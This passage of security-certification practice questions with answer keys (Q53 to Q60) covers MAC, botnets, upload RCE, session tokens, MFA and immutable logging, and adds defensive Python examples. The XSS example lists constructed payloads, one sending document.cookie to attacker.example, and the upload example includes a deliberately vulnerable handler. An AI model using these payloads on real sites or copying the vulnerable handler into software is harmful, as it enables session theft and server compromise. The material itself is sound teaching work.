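The mitigation list above says "output encoding", and the detail that matters in practice is that the encoding depends on where the value lands. The block below is an added example for this page, not CompTIA material or any framework's code: it shows the vulnerable concatenation next to correct handling for three contexts (HTML body, attribute value, URL attribute) using only Python's html module, plus the CSP header the list mentions as a backstop. The payload strings and the rendered markup are constructed for the illustration.

```python
import html

# Constructed payloads of the kind an attacker submits through a comment or profile field.
PAYLOADS = {
    "tag": "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>",
    "attr_breakout": '" onmouseover="alert(1)',
    "js_url": "javascript:alert(document.domain)",
}


def render_unsafe(comment: str) -> str:
    """Vulnerable: user input is concatenated straight into the HTML body."""
    return f"<div class='comment'>{comment}</div>"


def render_safe(comment: str) -> str:
    """HTML-body context: escape &, <, >, and quotes so the browser treats input as text."""
    return f"<div class='comment'>{html.escape(comment, quote=True)}</div>"


def render_attr_safe(title: str) -> str:
    """Attribute context: always quote the attribute AND escape quotes, or the value breaks out
    and adds its own event-handler attribute."""
    return f'<img alt="{html.escape(title, quote=True)}" src="/static/avatar.png">'


SAFE_URL_PREFIXES = ("http://", "https://", "/")


def render_link_safe(url: str) -> str:
    """URL context: escaping alone is not enough, because javascript: contains no special
    characters; allow-list the scheme first, then escape for the attribute."""
    if not url.lower().startswith(SAFE_URL_PREFIXES):
        url = "#"
    return f'<a href="{html.escape(url, quote=True)}">profile</a>'


# Defense in depth: blocks inline and third-party scripts even if an encoding bug slips through.
CSP_HEADER = ("Content-Security-Policy",
              "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'")


def raw_tag_count(fragment: str) -> int:
    """Number of literal '<' characters the browser would parse as markup (compare renderings)."""
    return fragment.count("<")
```

Templating engines (Jinja2 with autoescape, React JSX) do the body and attribute escaping for you, but the URL scheme check and the CSP still have to be added deliberately, and `|safe` / `dangerouslySetInnerHTML` switch the protection off again.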
Q53. An organization wants to implement a security model where users can only perform actions on resources for which they have been explicitly authorized, and access decisions are enforced based on strict classification levels. Which model should be implemented?
A. Discretionary access control (DAC)
B. Role-based access control (RBAC)
C. Mandatory access control (MAC)
D. Attribute-based access control (ABAC)
Answer: C. Mandatory access control (MAC)
Explanation:
Discretionary access control (DAC) allows owners of resources to determine access. DAC is flexible but not strict—users can share permissions with others. This model is unsuitable when strict enforcement of access based on classification is required.
Role-based access control (RBAC) assigns permissions to roles rather than individuals. RBAC simplifies administration but does not enforce strict classification-based restrictions unless combined with additional policies.
Mandatory access control (MAC) is correct. MAC enforces access decisions based on predefined policies, such as security labels (e.g., Confidential, Secret, Top Secret). Users cannot override these policies, ensuring strict enforcement. Key characteristics:
Centralized control: A system administrator defines policies that cannot be modified by end users.
Classification enforcement: Access to sensitive resources is granted strictly based on clearance and resource classification.
Use cases: Military, government, and high-security environments where policy compliance is mandatory.
Implementation considerations include:
Security labeling: Assign sensitivity levels to files, applications, and network resources.
Policy enforcement mechanisms: Use operating systems or middleware that support MAC (e.g., SELinux, AppArmor).
Auditing: Track attempts to access resources beyond authorized levels.
Attribute-based access control (ABAC) grants access dynamically based on user attributes, resource attributes, and context. ABAC is more flexible than MAC but is not strictly based on classification enforcement.
MAC is widely used in high-security environments where strict access enforcement is critical to prevent unauthorized disclosure of sensitive information.
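The two rules that make MAC "mandatory" rather than discretionary are easiest to see as code: a subject may read an object only if the subject's label dominates the object's (no read up), may write only if the object's label dominates the subject's (no write down), and neither the subject nor the object's owner can change a label. The block below is an added example for this page, not CompTIA material or SELinux's implementation; it is a small Bell-LaPadula reference monitor with levels and need-to-know compartments. The level names, the subjects, the file names and the "security_officer" role are assumptions for the illustration.

```python
from dataclasses import dataclass

LEVELS = {"unclassified": 0, "confidential": 1, "secret": 2, "top_secret": 3}


@dataclass(frozen=True)
class Label:
    """A classification level plus need-to-know compartments. Frozen: subjects cannot edit it."""
    level: str
    compartments: frozenset = frozenset()

    def dominates(self, other: "Label") -> bool:
        return (LEVELS[self.level] >= LEVELS[other.level]
                and other.compartments <= self.compartments)


def can_read(subject: Label, obj: Label) -> bool:
    """Simple security property: no read up."""
    return subject.dominates(obj)


def can_write(subject: Label, obj: Label) -> bool:
    """*-property: no write down. Classic BLP allows a blind write up (append without reading);
    many real systems tighten this to equal labels only."""
    return obj.dominates(subject)


class ReferenceMonitor:
    """Mediates every access, records the decision, and lets only the security officer relabel."""

    def __init__(self, officer: str = "security_officer"):
        self.officer = officer
        self.subjects = {}
        self.objects = {}
        self.audit = []

    def add_subject(self, name, level, compartments=()):
        self.subjects[name] = Label(level, frozenset(compartments))

    def add_object(self, name, level, compartments=()):
        self.objects[name] = Label(level, frozenset(compartments))

    def relabel(self, actor, obj, level, compartments=()):
        if actor != self.officer:   # centralized control: users and owners cannot downgrade
            raise PermissionError(f"{actor} may not relabel {obj}")
        self.objects[obj] = Label(level, frozenset(compartments))

    def check(self, subject, obj, op) -> bool:
        s, o = self.subjects[subject], self.objects[obj]
        allowed = can_read(s, o) if op == "read" else can_write(s, o)
        self.audit.append((subject, op, obj, "ALLOW" if allowed else "DENY"))
        return allowed
```

Contrast this with DAC, where the owner of `/docs/key-schedule` could simply grant the clerk read access; here no user-level action can produce that outcome, which is the property the question asks for.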
Q54. A security team observes that a particular system in the network exhibits unusually high CPU usage and large volumes of outbound traffic. Further analysis shows encrypted traffic communicating with external IPs at irregular intervals. Which type of attack is most likely occurring?
A. Ransomware
B. Botnet command and control
C. SQL injection
D. Privilege escalation
Answer: B. Botnet command and control (C2)
Explanation:
Ransomware encrypts local or network files and demands payment. High CPU usage may occur during encryption, but ransomware typically exhibits immediate file-locking behavior, not continuous outbound network traffic with encrypted communications.
Botnet command and control (C2) is correct. Botnets are networks of compromised systems that receive commands from an external controller. Indicators of botnet activity include:
High CPU or memory usage: Often due to mining cryptocurrency or processing commands.
Outbound network connections: Communication with C2 servers may be encrypted and sporadic to evade detection.
Abnormal traffic patterns: Regularly contacting unknown IPs, often at irregular intervals to avoid firewall scrutiny.
Mitigation strategies:
Network monitoring: Use IDS/IPS to detect unusual traffic patterns or beaconing behavior.
Endpoint detection and response (EDR): Identify anomalous processes consuming high resources.
Threat intelligence feeds: Block known malicious IP addresses and domains.
Segmentation: Isolate compromised systems to prevent lateral movement.
SQL injection affects database queries and does not typically cause high CPU usage or encrypted outbound network traffic at irregular intervals.
Privilege escalation is a local attack aimed at gaining higher access on a single host. While it may precede other attacks, the network-wide traffic behavior described aligns more with botnet C2 activity.
Botnets remain a critical threat vector for distributed denial-of-service (DDoS), spam campaigns, cryptocurrency mining, and lateral propagation. Organizations must proactively monitor endpoints and network flows to detect early botnet compromise.
Q55. During a penetration test, an analyst finds that a web application accepts file uploads but does not validate the file type or content. By uploading a malicious script and executing it through the server, the tester can gain shell access. What type of vulnerability is this?
A. Remote code execution
B. SQL injection
C. Cross-site request forgery
D. Insecure deserialization
Answer: A. Remote code execution (RCE)
Explanation:
Remote code execution (RCE) is correct. RCE occurs when an attacker can execute arbitrary code on a target system. In this scenario, the application's file upload functionality lacks proper validation or sanitization, allowing the tester to execute scripts or binaries on the server. RCE is one of the most critical vulnerabilities because it provides full control over the target system.
Indicators of RCE through an upload include script or binary files appearing in upload directories, the web server process spawning shells or other unexpected child processes, and outbound connections originating from the web server itself.
SQL injection exploits database queries, not arbitrary file execution.
Cross-site request forgery (CSRF) forces users to perform unintended actions but does not allow code execution on the server.
Insecure deserialization involves deserializing untrusted data but does not apply directly to file upload functionality unless the uploaded file contains serialized objects.
Vulnerabilities that lead to RCE are rated critical because of the severe consequences of server compromise; several OWASP Top 10 categories (injection, insecure design, vulnerable components) describe paths to it. Protecting web applications from RCE requires strict input validation, least privilege enforcement, and robust monitoring.
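Q42 lists the controls for an upload handler and Q55 shows what happens without them; the block below puts the two side by side. It is an added example for this page, not CompTIA material or any framework's upload code: `upload_unsafe` trusts the client's filename and writes under the web root (so a `.php` file is served and executed, and `../` escapes the directory), while `validate_upload` and `upload_safe` apply a size limit, an extension allow-list, magic-byte checking that must agree with the extension, a server-generated name, storage outside the web root, and no execute bit. The allow-list, the size limit, the directory names and the PHP/PNG sample contents are assumptions for the illustration.

```python
import os
import secrets
import tempfile
from pathlib import Path

MAX_BYTES = 5 * 1024 * 1024
# Allowed extensions and the magic bytes each must start with (assumed list for the example).
ALLOWED = {".png": b"\x89PNG\r\n\x1a\n", ".jpg": b"\xff\xd8\xff", ".pdf": b"%PDF-"}


def upload_unsafe(web_root: Path, filename: str, data: bytes) -> Path:
    """Vulnerable: trusts the client's filename and writes under the web root, so
    'shell.php' is served and executed, and '../x' escapes the intended directory."""
    dest = web_root / filename
    dest.write_bytes(data)
    return dest


def validate_upload(filename: str, data: bytes) -> tuple:
    """Size limit, extension allow-list, and content sniffing that must agree with the extension."""
    if len(data) > MAX_BYTES:
        return False, "too large"
    ext = Path(filename).suffix.lower()
    if ext not in ALLOWED:
        return False, f"extension {ext or '(none)'} not allowed"
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match extension"
    return True, "ok"


def upload_safe(store_dir: Path, filename: str, data: bytes) -> Path:
    """Hardened: validate, then store under a server-generated name, outside the web
    root, without execute permission. The client-supplied name never becomes a path."""
    ok, reason = validate_upload(filename, data)
    if not ok:
        raise ValueError(reason)
    dest = store_dir / f"{secrets.token_hex(16)}{Path(filename).suffix.lower()}"
    with open(dest, "xb") as fh:   # 'x' refuses to overwrite an existing file
        fh.write(data)
    os.chmod(dest, 0o640)
    return dest


def demo() -> dict:
    """Constructed scenario: a PHP script and a real PNG sent through both handlers."""
    tmp = Path(tempfile.mkdtemp())
    web_root, store = tmp / "webroot" / "uploads", tmp / "private_store"
    web_root.mkdir(parents=True)
    store.mkdir()
    php = b"<?php phpinfo(); ?>"
    png = b"\x89PNG\r\n\x1a\n" + bytes(32)
    placed = upload_unsafe(web_root, "../shell.php", php)   # lands one level above uploads/
    return {
        "unsafe_path": placed.resolve(),
        "web_root": web_root.resolve(),
        "php_check": validate_upload("shell.php", php),
        "double_ext_check": validate_upload("shell.php.png", php),
        "png_check": validate_upload("avatar.png", png),
        "safe_path": upload_safe(store, "avatar.png", png),
    }
```

Two server-side settings complete the picture and are outside this code: the web server must be configured not to execute anything from the upload location (or, better, never serve it directly, handing files out through a download handler with a fixed Content-Type and `Content-Disposition: attachment`), and the worker process that writes uploads should not be the same privileged account that the question's tester ended up with.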
Q56. A network administrator detects unusual outbound traffic from multiple workstations to unknown external IP addresses. Malware analysis shows that the workstations are part of a botnet used for cryptocurrency mining without user consent. Which type of malware is responsible?
A. Trojan
B. Worm
C. Botnet malware
D. Spyware
Answer: C. Botnet malware
Explanation:
Trojan is a type of malware that masquerades as legitimate software to trick users into executing it. While Trojans can deliver payloads like ransomware, spyware, or botnet agents, the primary scenario involves coordinated activity across multiple systems, which is more indicative of botnet malware rather than an isolated Trojan infection.
Worm is self-replicating malware that spreads automatically across networks, often without user interaction. Worms may propagate a botnet infection but do not by themselves explain coordinated, controlled mining activity to external servers.
Botnet malware is correct. Botnets are networks of compromised devices (bots) that are remotely controlled by an attacker through a command-and-control (C2) server. In this scenario, several key indicators point to a botnet:
Unusual outbound traffic: Bots often communicate with C2 servers over unusual ports, using encrypted traffic to avoid detection.
Resource exploitation: CPU and GPU utilization are abnormally high due to cryptocurrency mining.
Scale of infection: Multiple workstations participating indicates a coordinated attack, characteristic of botnets.
Botnets have many malicious applications, including:
Distributed Denial-of-Service (DDoS) attacks.
Spam campaigns.
Cryptojacking (unauthorized cryptocurrency mining).
Data exfiltration or espionage.
Mitigation strategies include:
Endpoint detection and response (EDR): Identify processes consuming high resources or connecting to suspicious IPs.
Network monitoring: Track and block communication with known malicious C2 servers.
Patch management: Prevent exploitation of vulnerabilities that allow malware installation.
User awareness: Educate users about phishing campaigns and suspicious downloads.
Spyware collects sensitive user information, such as browsing activity, credentials, or system data. Spyware is primarily focused on surveillance, not on coordinating a distributed network for cryptojacking.
Botnet malware represents a high-risk threat because it leverages internal resources for attacker benefit while remaining largely undetected. Organizations should combine proactive network monitoring, endpoint protection, and threat intelligence to identify botnet activity before it escalates.
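As an added illustration of the EDR and network-monitoring mitigations listed above (this is not part of the original question set or any vendor's product), the following Python script scores constructed endpoint telemetry for the three indicators the explanation names: sustained high CPU on a process, evenly spaced outbound contacts to an external address (beaconing), and the same external destination shared by several hosts. The telemetry rows, host names, process names and the internal address ranges are all constructed assumptions.

```python
import ipaddress
import statistics
from collections import defaultdict

# Constructed sample telemetry (not real data): one row per process sample.
# Fields: (timestamp_seconds, host, process, cpu_percent, destination_ip)
TELEMETRY = [
    (0,   "ws-01", "svchost.exe", 3.0,  "10.0.0.5"),       # internal, benign
    (0,   "ws-01", "updater.exe", 97.0, "203.0.113.42"),   # "updater" pegging the CPU
    (60,  "ws-01", "updater.exe", 96.0, "203.0.113.42"),
    (120, "ws-01", "updater.exe", 98.0, "203.0.113.42"),
    (180, "ws-01", "updater.exe", 95.0, "203.0.113.42"),
    (0,   "ws-02", "chrome.exe",  12.0, "198.51.100.7"),   # ordinary browsing
    (45,  "ws-02", "chrome.exe",  8.0,  "198.51.100.9"),
    (300, "ws-02", "chrome.exe",  5.0,  "198.51.100.7"),
    (0,   "ws-03", "updater.exe", 99.0, "203.0.113.42"),   # second host, same destination
    (60,  "ws-03", "updater.exe", 99.0, "203.0.113.42"),
    (120, "ws-03", "updater.exe", 99.0, "203.0.113.42"),
]

# Assumed internal address space; adjust to the real network plan.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_external(ip):
    """True when the address is outside the assumed internal ranges."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def find_suspects(records, cpu_threshold=90.0, min_samples=3, max_jitter=0.2):
    """Group samples by (host, process, destination) and flag series that show
    sustained high CPU and/or evenly spaced contacts with an external IP.
    Returns {(host, process, dst): [reasons]}."""
    series = defaultdict(list)
    for ts, host, proc, cpu, dst in records:
        series[(host, proc, dst)].append((ts, cpu))

    findings = {}
    for key, samples in series.items():
        _, _, dst = key
        if not is_external(dst) or len(samples) < min_samples:
            continue
        samples.sort()
        reasons = []
        cpus = [cpu for _, cpu in samples]
        if statistics.mean(cpus) >= cpu_threshold:
            reasons.append("sustained high CPU")
        # Beaconing: intervals between contacts with little jitter.
        gaps = [b[0] - a[0] for a, b in zip(samples, samples[1:])]
        mean_gap = statistics.mean(gaps)
        if mean_gap > 0 and statistics.pstdev(gaps) / mean_gap <= max_jitter:
            reasons.append(f"regular beacon every ~{mean_gap:.0f}s")
        if reasons:
            findings[key] = reasons
    return findings


def shared_destinations(findings):
    """External IPs contacted by more than one flagged host: the 'scale of
    infection' indicator that points at a coordinated botnet."""
    hosts_by_dst = defaultdict(set)
    for host, _, dst in findings:
        hosts_by_dst[dst].add(host)
    return {dst: sorted(hosts) for dst, hosts in hosts_by_dst.items() if len(hosts) > 1}


if __name__ == "__main__":
    suspects = find_suspects(TELEMETRY)
    for (host, proc, dst), why in sorted(suspects.items()):
        print(f"{host} {proc} -> {dst}: {', '.join(why)}")
    print("shared destinations:", shared_destinations(suspects))
```

The thresholds are deliberately explicit parameters: a real deployment tunes the CPU level, the minimum number of samples and the permitted jitter to its own baseline, and feeds the shared-destination output into the block list the "network monitoring" item above refers to.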
Q57. During a security assessment, a penetration tester finds that a company’s web application stores session tokens in URLs instead of secure cookies. Attackers could steal these tokens and impersonate users. Which type of vulnerability is present?
A. Cross-site scripting (XSS)
B. Session fixation
C. Insecure session management
D. Cross-site request forgery (CSRF)
Answer: C. Insecure session management
Explanation:
Cross-site scripting (XSS) involves injecting malicious scripts into web pages viewed by other users. While XSS can be used to steal session tokens, the vulnerability described is inherent to how the application manages sessions, not script injection.
Session fixation occurs when an attacker forces a user to use a known session ID, then hijacks the session once the user logs in. While related to session security, session fixation is different from improper token storage in URLs.
Insecure session management is correct. Session management ensures that user sessions are securely created, maintained, and invalidated. Storing session tokens in URLs is insecure because:
URLs are often recorded in server logs and browser history, and they are shared with third-party sites through Referer headers.
Tokens can be leaked through social engineering or phishing.
Tokens may remain valid for long periods, increasing exposure.
Best practices for session management include:
Secure cookies: Use the HttpOnly and Secure flags to protect tokens.
Session expiration: Enforce timeouts and inactivity limits.
Regenerate tokens: Issue a new token upon login or privilege changes to prevent session fixation.
Encryption: Protect tokens during transmission with TLS/HTTPS.
Cross-site request forgery (CSRF) tricks a user into performing unintended actions but does not directly relate to session token storage practices.
Insecure session management is one of the top web vulnerabilities because it directly enables attackers to impersonate legitimate users. By enforcing secure token storage, regeneration, and validation, organizations can protect session integrity.
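Added example, not taken from the original material: a small Python session store that applies the best practices listed above (HttpOnly, Secure and SameSite cookie flags, idle and absolute timeouts, token regeneration on login or privilege change), next to a check that flags the insecure pattern in the question, a session identifier carried in a URL query string. The list of parameter names, the timeouts and the cookie name are assumptions.

```python
import secrets
import time
from urllib.parse import parse_qs, urlparse

# Assumed parameter names that commonly carry session identifiers in URLs.
SESSION_PARAM_NAMES = {"sessionid", "session_id", "sid", "token", "jsessionid", "phpsessid"}


def url_carries_session_token(url):
    """The insecure pattern: a session identifier passed as a query parameter,
    where it lands in server logs, browser history and Referer headers."""
    query = parse_qs(urlparse(url).query)
    return any(name.lower() in SESSION_PARAM_NAMES for name in query)


def session_cookie_header(token, max_age=900):
    """Set-Cookie value for the secure alternative: HttpOnly keeps scripts away
    from the token, Secure restricts it to HTTPS, SameSite limits cross-site
    sending. The cookie name 'session' is an assumption."""
    return f"session={token}; Path=/; Max-Age={max_age}; HttpOnly; Secure; SameSite=Strict"


class SessionStore:
    """In-memory session table with absolute and idle expiry and token
    regeneration. 'clock' is injectable so expiry can be tested deterministically."""

    def __init__(self, absolute_ttl=8 * 3600, idle_ttl=900, clock=time.time):
        self.absolute_ttl = absolute_ttl
        self.idle_ttl = idle_ttl
        self._clock = clock
        self._sessions = {}

    def create(self, user, privilege="user"):
        token = secrets.token_urlsafe(32)          # 256 bits from the CSPRNG
        now = self._clock()
        self._sessions[token] = {"user": user, "privilege": privilege,
                                 "created": now, "last_seen": now}
        return token

    def regenerate(self, old_token, privilege=None):
        """Issue a fresh token and retire the old one (login, privilege change).
        This is what defeats session fixation: a pre-authentication token never
        survives into the authenticated session."""
        data = self._sessions.pop(old_token, None)
        if data is None:
            raise KeyError("unknown or expired session")
        if privilege is not None:
            data["privilege"] = privilege
        data["last_seen"] = self._clock()
        token = secrets.token_urlsafe(32)
        self._sessions[token] = data
        return token

    def validate(self, token):
        """Return the session data, or None if the token is unknown or expired."""
        data = self._sessions.get(token)
        if data is None:
            return None
        now = self._clock()
        if now - data["created"] > self.absolute_ttl or now - data["last_seen"] > self.idle_ttl:
            del self._sessions[token]
            return None
        data["last_seen"] = now
        return data
```

The URL check is useful beyond the application itself: running it over access-log entries is a quick way to confirm whether tokens are already being written to disk, which is the exposure the explanation describes.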
Q58. A financial organization wants to implement multi-factor authentication (MFA) for all employees. They plan to use a combination of something the user knows (password), something the user has (TOTP token), and something the user is (fingerprint). Which type of authentication is being implemented?
A. Single-factor authentication
B. Two-factor authentication
C. Multi-factor authentication
D. Risk-based authentication
Answer: C. Multi-factor authentication (MFA)
Explanation:
Single-factor authentication uses only one type of credential, such as a password. It provides minimal protection and is insufficient for sensitive financial environments.
Two-factor authentication (2FA) combines exactly two factors, usually something you know and something you have. While more secure than single-factor authentication, it is limited to two forms of validation.
Multi-factor authentication (MFA) is correct. MFA involves two or more distinct authentication factors, typically categorized as:
Something you know: Passwords or PINs.
Something you have: Hardware tokens, TOTP apps, smart cards.
Something you are: Biometrics like fingerprints, facial recognition, or iris scans.
In this scenario, the organization implements all three factors, significantly increasing security by reducing the likelihood of compromise even if one factor is exposed. Benefits of MFA include:
Preventing account compromise through stolen credentials.
Reducing phishing risk.
Aligning with regulatory requirements (e.g., PCI DSS, NIST SP 800-63).
Risk-based authentication evaluates risk factors, such as geolocation or device reputation, to adjust authentication requirements dynamically. While complementary to MFA, it is not the primary method described.
MFA is essential for protecting sensitive financial accounts and critical corporate systems. Adoption of MFA reduces attack surfaces and improves overall resilience against credential-based attacks.
Q59. During a penetration test, an analyst identifies that the company’s web application allows uploading of ZIP archives containing scripts. When uploaded, the scripts execute on the server, providing shell access. What type of vulnerability is present?
A. Remote code execution (RCE)
B. SQL injection
C. Cross-site scripting (XSS)
D. Directory traversal
Answer: A. Remote code execution (RCE)
Explanation:
Remote code execution (RCE) is correct. RCE occurs when an attacker can execute arbitrary commands or scripts on the server. The vulnerability here arises because the application accepts archives with executable scripts, which are then processed without validation. Consequences include:
Full compromise of the web server.
Ability to read, modify, or delete sensitive data.
Potential lateral movement within the network.
Mitigation strategies:
Input validation: Reject executable content and limit file types.
Sandboxing: Execute user uploads in isolated environments.
Access control: Limit the privileges of processes handling uploaded files.
Monitoring: Detect unusual server activity or abnormal processes.
SQL injection targets databases through unsanitized queries and does not explain arbitrary server code execution.
Cross-site scripting (XSS) affects client-side code and cannot provide shell access to the server.
Directory traversal allows attackers to access unauthorized files but does not inherently execute code on the server.
RCE is highly critical and is considered one of the most severe vulnerabilities because it can provide full system control. Securing file uploads and enforcing least privilege are vital controls.
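Added example (not the page's or any project's code) serving both the upload scenario at the top of this section and Q59: a Python pre-screen for ZIP uploads that applies the "input validation" and "reject executable content" points above before anything is extracted. It allowlists member extensions, rejects entries whose path would escape the upload directory, and caps member count and declared uncompressed size. The allowlist, limits and sample archives are constructed assumptions.

```python
import io
import posixpath
import zipfile

# Assumed policy: allowlist of member extensions and resource caps.
ALLOWED_EXTENSIONS = {".txt", ".csv", ".png", ".jpg", ".jpeg", ".pdf"}
MAX_MEMBERS = 100
MAX_TOTAL_UNCOMPRESSED = 20 * 1024 * 1024   # 20 MiB


def member_escapes(name):
    """True for absolute paths, Windows separators or '..' components, any of
    which could place an extracted file outside the upload directory."""
    return posixpath.isabs(name) or "\\" in name or ".." in name.split("/")


def validate_archive(data):
    """Inspect the central directory only; nothing is extracted.
    Returns (ok, problems)."""
    problems = []
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return False, ["not a valid ZIP archive"]
    with archive:
        members = archive.infolist()
        if len(members) > MAX_MEMBERS:
            problems.append(f"too many members ({len(members)} > {MAX_MEMBERS})")
        total = 0
        for info in members:
            name = info.filename
            if member_escapes(name):
                problems.append(f"{name}: path escapes upload directory")
                continue
            if info.is_dir():
                continue
            ext = posixpath.splitext(name)[1].lower()
            if ext not in ALLOWED_EXTENSIONS:
                # Allowlisting also catches double extensions such as photo.jpg.php.
                problems.append(f"{name}: extension {ext or '(none)'} not allowed")
            total += info.file_size
            if total > MAX_TOTAL_UNCOMPRESSED:
                problems.append("declared uncompressed size exceeds limit")
                break
    return not problems, problems


def make_zip(members):
    """Build a constructed in-memory archive from {name: bytes} for testing."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


if __name__ == "__main__":
    print(validate_archive(make_zip({"report.txt": b"quarterly", "img/logo.png": b"\x89PNG"})))
    print(validate_archive(make_zip({"site.php": b"placeholder", "../../outside.txt": b"x"})))
```

This check is one layer, not the whole control: the extracted files still belong under the "sandboxing" and "access control" items above, written to a location the web server does not execute from, by a process that cannot write anywhere else.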
Q60. A security administrator wants to ensure that logs collected from multiple network devices cannot be tampered with, even if an attacker gains administrative access to the logging server. Which technique is most appropriate?
A. Centralized logging
B. Immutable logging
C. Log rotation
D. Log aggregation
Answer: B. Immutable logging
Explanation:
Centralized logging consolidates logs from multiple devices to a single location. While it simplifies management, it does not inherently prevent tampering if an attacker gains access to the server.
Immutable logging is correct. Immutable logs are write-once, read-many (WORM) records that cannot be modified or deleted. Key properties include:
Tamper-evident or tamper-proof storage.
Cryptographic hash chaining to detect changes.
Compliance with regulatory frameworks (e.g., PCI DSS, HIPAA, SOX).
Benefits of immutable logging:
Provides trustworthy forensic evidence.
Detects and prevents attempts to alter historical records.
Enables incident investigations with confidence in log integrity.
Implementation strategies include:
Write-once storage: Use WORM drives or object storage with immutability features.
Cryptographic hashing: Generate hashes for each log entry and verify periodically.
Append-only databases: Use systems designed to prevent deletion or modification of historical entries.
Log rotation manages log file size and retention but does not prevent tampering.
Log aggregation collects logs into a centralized system for analysis but does not guarantee immutability.
Immutable logging is a cornerstone of secure logging practices. By ensuring logs are tamper-proof, organizations can reliably investigate incidents, satisfy compliance requirements, and maintain accountability.
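Added example, not taken from the page: the "cryptographic hashing" implementation strategy above, written in Python as an append-only log where each record commits to the hash of its predecessor, with a verifier that reports the first broken record. It also shows the caveat a practitioner should know: chaining alone cannot reveal that trailing records were deleted, so the latest hash (the head) has to be anchored somewhere the logging server's administrator cannot rewrite. The sample events and field names are constructed.

```python
import hashlib
import json

GENESIS = "0" * 64   # prev-hash of the first record


def _digest(record):
    """SHA-256 over the canonical JSON of every field except 'hash'."""
    body = {k: v for k, v in record.items() if k != "hash"}
    return hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()


class HashChainLog:
    """Append-only log; each record commits to the hash of the one before it."""

    def __init__(self):
        self.records = []

    def append(self, message, **fields):
        prev = self.records[-1]["hash"] if self.records else GENESIS
        record = {"seq": len(self.records), "message": message, **fields, "prev": prev}
        record["hash"] = _digest(record)
        self.records.append(record)
        return record["hash"]

    @property
    def head(self):
        """Latest hash: publish it to an external, write-once location."""
        return self.records[-1]["hash"] if self.records else GENESIS


def verify_chain(records, expected_head=None):
    """Return (ok, first_bad_index). Any edit, insertion or reorder breaks the
    chain at the first affected record; deletion of the tail does not, which
    is why the head must be compared against an externally anchored value."""
    prev = GENESIS
    for i, rec in enumerate(records):
        if rec.get("seq") != i or rec.get("prev") != prev or rec.get("hash") != _digest(rec):
            return False, i
        prev = rec["hash"]
    if expected_head is not None and prev != expected_head:
        return False, len(records)
    return True, None


if __name__ == "__main__":
    log = HashChainLog()
    log.append("login", user="alice", src="10.0.0.5")            # constructed events
    log.append("sudo", user="alice", cmd="systemctl restart nginx")
    log.append("logout", user="alice")
    anchored_head = log.head                                      # e.g. copied to WORM storage

    print("intact:", verify_chain(log.records, anchored_head))
    edited = [dict(r) for r in log.records]
    edited[1]["cmd"] = "true"
    print("edited record:", verify_chain(edited, anchored_head))
    truncated = log.records[:-1]
    print("tail deleted, no anchor:", verify_chain(truncated))
    print("tail deleted, anchored:", verify_chain(truncated, anchored_head))
```

A plain hash chain is tamper-evident only against someone who cannot recompute it; an attacker with administrative access to the logging server can rewrite every hash after an edit. What makes the edit detectable is the anchored head (or, equivalently, an HMAC key that never lives on that server), which is the "write-once storage" item above in another form.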